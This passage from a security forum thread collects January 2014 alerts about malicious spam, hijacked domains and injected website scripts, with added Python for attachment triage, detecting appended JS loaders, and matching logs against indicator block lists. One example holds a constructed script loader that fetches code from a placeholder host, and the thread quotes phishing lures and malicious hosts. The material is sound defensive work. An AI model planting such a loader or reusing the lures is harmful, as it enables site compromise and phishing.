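                kind = sniff(fh.read(8))
            reasons = []
            if final_ext in EXECUTABLE_EXTS:
                reasons.append("executable extension %s" % final_ext)
            if kind == "pe":
                reasons.append("content is a Windows PE (MZ header)")
            if len(exts) > 1 and any(e in DOCUMENT_EXTS for e in exts[:-1]):
                reasons.append("double extension %s hides the real type" % "".join(exts))
            if final_ext in EXPECTED and kind != "unknown" and kind not in EXPECTED[final_ext]:
                reasons.append("extension %s but content sniffs as %s" % (final_ext, kind))
            findings.append({"name": info.filename, "kind": kind,
                             "verdict": "block" if reasons else "allow",
                             "reasons": reasons})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive: the lure named in the post plus three test cases."""
    pe_stub = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56  # just enough DOS header to sniff
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("RBS_Bankline_Password_Reactivation.exe", pe_stub)  # name from the post
        zf.writestr("Statement.pdf", b"%PDF-1.4\n1 0 obj<<>>endobj\n")   # constructed, benign
        zf.writestr("IMG_0042.jpg.scr", pe_stub)                         # constructed double extension
        zf.writestr("Report.pdf", pe_stub)                               # constructed: PE behind .pdf
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print("%-45s %-7s %-5s %s" % (f["name"], f["kind"], f["verdict"], "; ".join(f["reasons"])))
```

    The verdict never depends on the icon, which is exactly what the user sees and the malware controls; the "Report.pdf" case shows why the magic-byte check is needed even when the extension is a harmless one. Nested archives (kind "zip") should be recursed into before they reach a user.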

  8. #358

    Cushion Redirect sites using hijacked GoDaddy domains to block

    FYI...

    Cushion Redirect sites using hijacked GoDaddy domains to block
    - http://blog.dynamoo.com/2014/01/cush...-hijacked.html
    16 Jan 2014 - "... some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine) which appears to be hosting some Cushion Redirect domains (explained here*) which is being injected into certain sites such as the one in this URLquery report**... A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects... The hijacked GoDaddy domains in question are:
    allgaysitespassfree .com
    amateurloginfree .com
    yourchicagocarservice .com
    yourchicagogranite .com
    yourchicagohummerlimo .com
    yourbestpartybus .com
    A quick look at the Google stats for AS42655*** indicate to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites."
    * http://malwaremustdie.blogspot.com/2...ttempt-to.html

    ** http://urlquery.net/report.php?id=8838865

    - https://www.virustotal.com/en-gb/ip-...9/information/

    *** http://www.google.com/safebrowsing/d...?site=AS:42655
    ___

    Script exploits lead to Adscend Media LLC ads
    - http://blog.dynamoo.com/2014/01/scri...end-media.html
    16 Jan 2014 - "Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious. Here is a case in point.. the German website physiomedicor .de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report*. In this case it's pretty easy to tell what's going on from the URLquery screenshot:
    > http://3.bp.blogspot.com/-BqNzhIdeK1...0/urlquery.jpg
    What has happened is that somehow an attacker has altered several .js files on the victim's site and has appended extra code. In this case the code has been appended to [donotclick]www.physiomedicor .de/assets/rollover.js as follows...
    > http://4.bp.blogspot.com/-Gb14LMV3ni...injection1.png
    In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia .com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:
    [donotclick]berriesarsuiz .com/ptc84vRb.php?id=117515949
    [donotclick]www.karsons .co .uk/qdrX3tDB.php?id=114433444
    ... Adscend Media has been accused of deceptive advertising practices** before which makes me think that it might be a good candidate for -blocking- on your network, especially as they have private WHOIS details for that domain. If you want to banish these from your network then the following list might help:
    199.59.164.5
    adscendmedia .com
    adshiftclick .com
    jmp2 .am
    lnkgt .com
    ..."
    (More detail at the dynamoo URL above.)
    * http://urlquery.net/report.php?id=8840002

    ** http://news.cnet.com/8301-1023_3-574...hington-state/

    81.169.145.150
    - https://www.virustotal.com/en-gb/ip-...0/information/
    ___

    Fake malicious "ACTION REQUIRED" SPAM
    - http://blog.dynamoo.com/2014/01/acti...s-arrived.html
    16 Jan 2014 - "This spam with a lengthy subject has a malicious attachment:
    Date: Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
    From: "support@salesforce .com" [support@salesforce .com]
    Subject: ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
    Priority: High Priority 2
    This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.
    Record ID: HJRQY9PSXBSK334
    Supplier: http ://[victimdomain .com]
    Invoice No.: 5644366804
    Document No.: 3319683775
    Invoice amount: USD 0488.21
    Rejection reason(s): Approval Required
    Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons.


    Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48*... analysis shows an attempted connection to centrum .co .id on 75.98.233.44 (Ceranet, US). This is the only site on that server, blocking either the IP or domain might be useful."
    * https://www.virustotal.com/en-gb/fil...is/1389889350/

    - http://threattrack.tumblr.com/post/7...malicious-spam
    Jan 16, 2014
    Screenshot: https://gs1.wac.edgecastcdn.net/8019...Q3n1r6pupn.png
    Tagged: Salesforce, Upatre
    ___

    Google+ Local - Thousands Of Hotel Listings Hijacked
    - http://searchengineland.com/thousand...e-local-181670
    Jan 14, 2014 - "Thousands of hotels listed within Google+ Local appear to have had links leading to their official sites “hijacked” and replaced with ones leading to third-party booking services. Google+ Local listings are what Google depends on to provide results in Google Maps or Google Search, when people look for local businesses... Doing a search on Google for Google+ Local listings using these domains reveals how thousands of hotels appear to have been hit. For example, a search for listings using the “RoomsToBook .Info” domain currently brings up 1,880 listings that appear to have been hijacked:
    > http://searchengineland.com/figz/wp-...-4-600x816.jpg
    Postscript: Google has now said that I can confirm it is aware of the issue and is working to fix it."

    - http://searchengineland.com/local-se...ackings-181933
    Jan 16, 2014 - "... Without offering any substantive comments about the situation Google appears to have cleaned up the problem and mostly if not entirely restored the proper links. There’s been no explanation forthcoming about how this might have happened from the company, though Google acknowledged the incident..."

    Last edited by AplusWebMaster; 2014-01-17 at 17:22.
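    Both the F-Secure and dynamoo write-ups in this and the previous post describe the same tampering: the attacker leaves the site's own .js files intact and appends a loader that pulls a script from a hijacked host. A site owner can catch that pattern with a known-good baseline, and because the original bytes are untouched, a baseline of hash plus length is enough to tell "something was appended" from "the file was rewritten". The following is an added example, not code from either blog or from the affected site. It assumes you record sha256 and size of each deployed asset when the site is known good; the file contents and the appended loader are constructed, since the real injected code appears only as an image in the post.

```python
"""Detect appended loaders in a site's .js assets against a known-good baseline.

Added example, standard library only. File contents and the injected tail are
constructed; the baseline format (path -> sha256 + size) is an assumption.
"""
import hashlib
import re
from typing import Dict, List

# Absolute or protocol-relative URL; the post's injected URLs have the shape
# "<random>.php?id=<digits>" on a hijacked host.
URL_RE = re.compile(r"(?:https?:)?//[A-Za-z0-9.\-]+(?:/[^\s'\"<>()]*)?")


def baseline(files: Dict[str, bytes]) -> Dict[str, Dict]:
    """Record sha256 and size of every known-good file; nothing else is needed."""
    return {path: {"sha256": hashlib.sha256(data).hexdigest(), "size": len(data)}
            for path, data in files.items()}


def audit(base: Dict[str, Dict], current: Dict[str, bytes]) -> List[Dict]:
    """Compare the deployed files to the baseline and pull URLs out of any new code."""
    findings = []
    for path, data in current.items():
        rec = base.get(path)
        if rec is None:
            findings.append({"path": path, "status": "new",
                             "urls": URL_RE.findall(data.decode("utf-8", "replace"))})
            continue
        if hashlib.sha256(data).hexdigest() == rec["sha256"]:
            findings.append({"path": path, "status": "unchanged", "urls": []})
            continue
        # If the first <baseline size> bytes still hash to the baseline value, the
        # original was left alone and only a tail was added: the injection pattern.
        prefix_ok = (len(data) > rec["size"] and
                     hashlib.sha256(data[:rec["size"]]).hexdigest() == rec["sha256"])
        tail = data[rec["size"]:] if prefix_ok else data
        findings.append({"path": path, "status": "appended" if prefix_ok else "modified",
                         "urls": URL_RE.findall(tail.decode("utf-8", "replace"))})
    for path in sorted(base.keys() - current.keys()):
        findings.append({"path": path, "status": "missing", "urls": []})
    return findings


# Constructed stand-ins for a site's assets (not the real physiomedicor .de files).
KNOWN_GOOD = {
    "assets/rollover.js": b"function rollover(e){e.src=e.getAttribute('data-hover');}\n",
    "assets/menu.js": b"document.addEventListener('DOMContentLoaded',function(){});\n",
}
# Constructed loader of the kind described in the post; hijacked.example is a placeholder.
INJECTED_TAIL = (b"\nvar s=document.createElement('script');"
                 b"s.src='http://hijacked.example/a1b2C3d4.php?id=123456789';"
                 b"document.getElementsByTagName('head')[0].appendChild(s);\n")
AFTER_COMPROMISE = {
    "assets/rollover.js": KNOWN_GOOD["assets/rollover.js"] + INJECTED_TAIL,
    "assets/menu.js": KNOWN_GOOD["assets/menu.js"],
}


def demo() -> List[Dict]:
    """Run the audit on the constructed before/after snapshot."""
    return audit(baseline(KNOWN_GOOD), AFTER_COMPROMISE)


if __name__ == "__main__":
    for f in demo():
        print(f["status"].ljust(10), f["path"], " ".join(f["urls"]))
```

    In practice the baseline is written at deploy time and the audit runs from cron against the document root; any "appended" or "modified" status on a file nobody deployed is the signal, and the extracted URLs are the hosts to look up and block. The regex will also catch a protocol-relative "//host" in comments, so review hits rather than acting on them blindly.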

  9. #359

    Fake Experian Credit Report Malicious SPAM...

    FYI...

    Fake Experian Credit Report Malicious Spam
    - http://threattrack.tumblr.com/post/7...malicious-spam
    Jan 17, 2014 - "Subjects Seen:
    IMPORTANT - A Key Change Has Been Posted
    Typical e-mail details:
    A key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian®, Equifax and TransUnion Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don’t know how it will affect your credit, so we urge you to do the following:
    View detailed report by opening the attachment.
    You will be prompted to open (view) the file or save (download) it to your computer.
    For best results, save the file first, then open it in a Web browser.
    Contact our Customer Care Center with any additional questions.
    Note: The attached file contains personal data.


    Malicious File Name and MD5:
    Credit_Report_4287362163.zip (1B1C6223EC52CE2E2B8CE6C117A15ADA)
    Credit_Report_4287362163.exe (B4101936ED3C8BC09F994223A39E5FE2)


    Screenshot: https://31.media.tumblr.com/5f9f8502...VC01r6pupn.png

    Tagged: Experian, Upatre
    ___

    Threat Outbreak Alerts
    - http://tools.cisco.com/security/cent...utbreak.x?i=77
    Fake Photograph Sharing Email Messages - 2014 Jan 17
    Fake Court Notice Email Messages - 2014 Jan 17
    Fake Fax Message Receipt Email Messages - 2014 Jan 17
    Fake Credit Report Email Messages - 2014 Jan 17
    Fake Fax Message Delivery Email Messages - 2014 Jan 17
    Fake Job Offer Notification Email Messages - 2014 Jan 17
    Fake Account Payment Information Email Messages - 2014 Jan 17
    Fake Failed Delivery Notification Email Messages - 2014 Jan 17
    Fake Fax Message Delivery Email Messages - 2014 Jan 17
    Fake Incoming Money Transfer Notification Email Messages - 2014 Jan 17
    Fake Invoice Statement Attachment Email Messages - 2014 Jan 17
    Fake Delivery Express Parcel Notification Email Messages - 2014 Jan 17
    Fake Anti-Phishing Email Messages - 2014 Jan 17
    Malicious Personal Pictures Attachment Email Messages - 2014 Jan 17
    Fake Product Order Notification Email Messages - 2014 Jan 17
    (More detail and links at the cisco URL above.)

    Last edited by AplusWebMaster; 2014-01-18 at 14:30.

  10. #360

    Spyware attacks, PG&E SPAM...

    FYI...

    Spyware attacks against U.S. bloggers ...
    - http://www.welivesecurity.com/2014/0...rs-eff-claims/
    20 Jan 2014 - "A single anti-government blog post is enough to trigger personalized spyware attacks from hacker groups supporting the Vietnamese communist state, which the Electronic Frontier Foundation claims* targets anti-government bloggers – even those in other countries – with malware, including its staff, and Californian activists... The new campaign, though, used highly targeted attacks aimed at specific critics of the government – including EFF staff... The -malware- was sent out as a link to a Google document, and was sent in emails tailored to targets – the activists were invited to a conference, and an Associated Press journalist was offered a white paper from Human Rights Watch..."
    * https://www.eff.org/deeplinks/2014/0...-gets-personal
    Jan 19, 2014

    - https://net-security.org/malware_news.php?id=2679
    20.01.2014
    ___

    PG&E SPAM - Malware distribution campaign
    - https://isc.sans.edu/diary.html?storyid=17459
    Last Updated: 2014-01-19 18:41:43 UTC - "Starting about 10 days or so ago, a Spam campaign began targeting Pacific Gas and Energy (PG&E), a large U.S. energy provider. PG&E has been aware of this campaign for about a week, and has informed its customers.
    > http://www.pgecurrents.com/2014/01/0...-emails-calls/
    ... these emails look quite professional and the English is good. The only real issue in the email being formatting of some of the currency figures.
    > https://isc.sans.edu/diaryimages/ima...EStatement.jpg
    The header revealed that it was sent from user nf@ www1 .nsalt .net using IP 212.2.230.181, most likely a compromised webmail account. Both the from and the reply-to fields are set to do_not_reply@ nf .kg, an email address that bounces. The 212.2.230.181 IP, the nf .kg domain and the nsalt .net domain - all map to City Telecom Broadband in Kyrgyzstan (country code KG)... the goal of this particular campaign seems to be malware distribution. The "click here" links in the two samples point to different places
    hxxp ://s-dream1 .com/message/e2y+KAkbElUyJZk38F2gvCp7boiEKa2PSdYRj+YOvLI=/pge
    hxxp ://paskamp .nl/message/hbu8N3ny7oAVfvBZrZWLSrkYv2kTbwArk3+Tspbd2Cg=/pge
    Both of these links are now down, but when they were alive they both served up PGE_FullStatement_San_Francisco_94118.zip which contained a Windows executable... Virustotal has a 5/48 detection rate indicating this is most likely a Trojan Dropper:
    > https://isc.sans.edu/diaryimages/ima...ustotalpge.jpg ..."

    - https://www.virustotal.com/en/ip-add...1/information/
    ___

    Spammers buy Chrome extensions - turn them into adware
    - https://www.computerworld.com/s/arti...em_into_adware
    Jan 20, 2014 - "... At least two Chrome extensions recently sold by their original developers were updated to inject ads and affiliate links into legitimate websites opened in users' browsers. The issue first came to light last week when the developer of the "Add to Feedly" extension, a technology blogger named Amit Agarwal, reported that after selling his extension late last year to a third-party, it got transformed into adware... A second developer, Roman Skabichevsky, confirmed Monday that his Chrome extension called "Tweet This Page" suffered a similar fate after he sold it at the end of November... According to the Chrome Web Store developer program policies, advertising is allowed in apps hosted in the store, but there are strict criteria for displaying ads on third-party websites..."
    ___

    Bill Me Later Payment Spam
    - http://threattrack.tumblr.com/post/7...r-payment-spam
    Jan 20, 2014 - "Subjects Seen:
    Thank you for scheduling a payment to Bill Me Later
    Typical e-mail details:
    Dear Customer,
    Thank you for making a payment online! We’ve received your
    Bill Me Later® payment of $1201.39 and have applied it to your account.
    For more details please check attached file
    Summary:
    Your Bill Me Later Account Number Ending in: 0759
    You Paid: $1201.39
    Your Payment Date*: 01/20/2014
    Your Payment Confirmation Number: 042075773771348058


    Malicious File Name and MD5:
    PP_03357442.zip (93C0326C3D37927E4C38C90016C7F14C)
    PP_03357442.exe (2B68D8CC7CB979EA9A1405D32E30A00A)


    Screenshot: https://31.media.tumblr.com/dcb80e6f...Q2R1r6pupn.png

    Tagged: bill me later, Upatre

    - http://blog.dynamoo.com/2014/01/than...ayment-to.html
    20 Jan 2014 - "This -fake- Bill Me Later spam has a malicious attachment:
    Date: Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
    From: Bill Me Later [service@ paypal .com]
    Subject: Thank you for scheduling a payment to Bill Me Later
    BillMeLater
    Log in here
    Your Bill Me Later statement is now available!
    Dear Customer,
    Thank you for making a payment online! We've received your
    Bill Me Later® payment of $1603.57 and have applied it to your account.
    For more details please check attached file
    Summary:
    Your Bill Me Later Account Number Ending in: 0266
    You Paid: $1603.57
    Your Payment Date*: 01/20/2014
    Your Payment Confirmation Number: 971892583971968191 ...


    Screenshot: https://lh3.ggpht.com/-g4CABaa5Ka4/U...illmelater.png

    Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45*. Automated analysis tools... show an attempted connection to jatit .org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site."
    * https://www.virustotal.com/en-gb/fil...is/1390235463/
    ___

    Fake WhatsApp "A friend of yours has just sent you a pic" SPAM
    - http://blog.dynamoo.com/2014/01/what...just-sent.html
    20 Jan 2014 - "This -fake- WhatsApp spam has a malicious attachment:
    Date: Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
    From: WhatsApp [{messages@ whatsapp .com}]
    Subject: A friend of yours has just sent you a pic
    Hey!
    Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.
    2013 WhatsApp Inc


    Screenshot: https://lh3.ggpht.com/-ogFWbF6oOwk/U...0/whatsapp.png

    Attached to the message is an archive file IMG9900882.zip which in turn contains a malicious executable IMG9900882.exe which has a VirusTotal detection rate of 20/49*... analysis gives few clues as to what the malware does, other automated analysis tools are inconclusive."
    * https://www.virustotal.com/en/file/a...is/1390244298/

    Last edited by AplusWebMaster; 2014-01-20 at 22:50.
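    Posts #358 and #360 between them hand out a mix of indicators: a /22 to block (194.28.172.0/22), single IPs such as the Adscend Media address and the payload servers behind the Salesforce, PG&E and Bill Me Later runs, and domain lists including the hijacked GoDaddy names. The following is an added example of turning those into a matcher for proxy or DNS logs; it is not code from dynamoo, ThreatTrack or SANS ISC. The indicators are copied from the posts above (with the defanging spaces removed); the log line format and all log lines are constructed. Several of the hosts (jatit .org, centrum .co .id, paskamp .nl) are described in the posts as compromised legitimate sites, so treat hits as leads to review and give the list an expiry date rather than blocking forever.

```python
"""Match constructed proxy log lines against the indicators collected in #358 and #360.

Added example, standard library only. Indicators are from the quoted posts; the log
format ("<ts> <client_ip> <dst_host> <dst_ip> <url>") and the lines are constructed.
"""
import ipaddress
from typing import Dict, List

BLOCK_NETWORKS = [ipaddress.ip_network(n) for n in (
    "194.28.172.0/22",   # BESTHOSTING-AS, Cushion Redirect hosting (dynamoo, 16 Jan)
    "199.59.164.5/32",   # Adscend Media (dynamoo, 16 Jan)
    "75.98.233.44/32",   # centrum .co .id, "ACTION REQUIRED" payload server (dynamoo, 16 Jan)
    "72.9.158.240/32",   # jatit .org, Bill Me Later payload server (dynamoo, 20 Jan)
    "212.2.230.181/32",  # PG&E spam sending host (SANS ISC, 19 Jan)
)]

BLOCK_DOMAINS = {
    # Adscend Media list (dynamoo, 16 Jan)
    "adscendmedia.com", "adshiftclick.com", "jmp2.am", "lnkgt.com",
    # hijacked GoDaddy domains used for Cushion Redirects (dynamoo, 16 Jan)
    "allgaysitespassfree.com", "amateurloginfree.com", "yourchicagocarservice.com",
    "yourchicagogranite.com", "yourchicagohummerlimo.com", "yourbestpartybus.com",
    # payload hosts from the spam runs (dynamoo 16/20 Jan, SANS ISC 19 Jan)
    "centrum.co.id", "jatit.org", "s-dream1.com", "paskamp.nl",
}


def domain_hit(host: str) -> str:
    """Return the matching indicator for host or any of its subdomains, else ''."""
    host = host.lower().rstrip(".")
    for d in BLOCK_DOMAINS:
        if host == d or host.endswith("." + d):
            return d
    return ""


def ip_hit(addr: str) -> str:
    """Return the matching network (as text) for addr, else ''."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return ""
    for net in BLOCK_NETWORKS:
        if ip in net:
            return str(net)
    return ""


def scan(lines: List[str]) -> List[Dict]:
    """Return one hit record per log line whose host or destination IP matches."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, host, dst_ip = fields[:4]
        d, n = domain_hit(host), ip_hit(dst_ip)
        if d or n:
            hits.append({"ts": ts, "client": client, "host": host, "dst_ip": dst_ip,
                         "domain_ioc": d, "network_ioc": n})
    return hits


SAMPLE_LOG = [  # constructed lines; 194.28.175.129 is the Cushion Redirect server in #358
    "2014-01-16T10:02:11Z 10.1.4.23 cdn.yourchicagogranite.com 194.28.175.129 http://cdn.yourchicagogranite.com/r.php",
    "2014-01-16T10:02:12Z 10.1.4.23 lnkgt.com 199.59.164.5 http://lnkgt.com/x",
    "2014-01-16T10:03:40Z 10.1.4.51 www.example.org 93.184.216.34 http://www.example.org/",
    "2014-01-20T14:30:02Z 10.1.7.8 jatit.org 72.9.158.240 http://jatit.org/",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ts"], h["client"], "->", h["host"], h["dst_ip"],
              "domain:", h["domain_ioc"] or "-", "net:", h["network_ioc"] or "-")
```

    Matching on both the host name and the destination address matters here: the Cushion Redirect subdomains rotate freely under the hijacked GoDaddy names, so the suffix match catches new subdomains, while the /22 catches a fresh domain parked on the same Ukrainian range.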
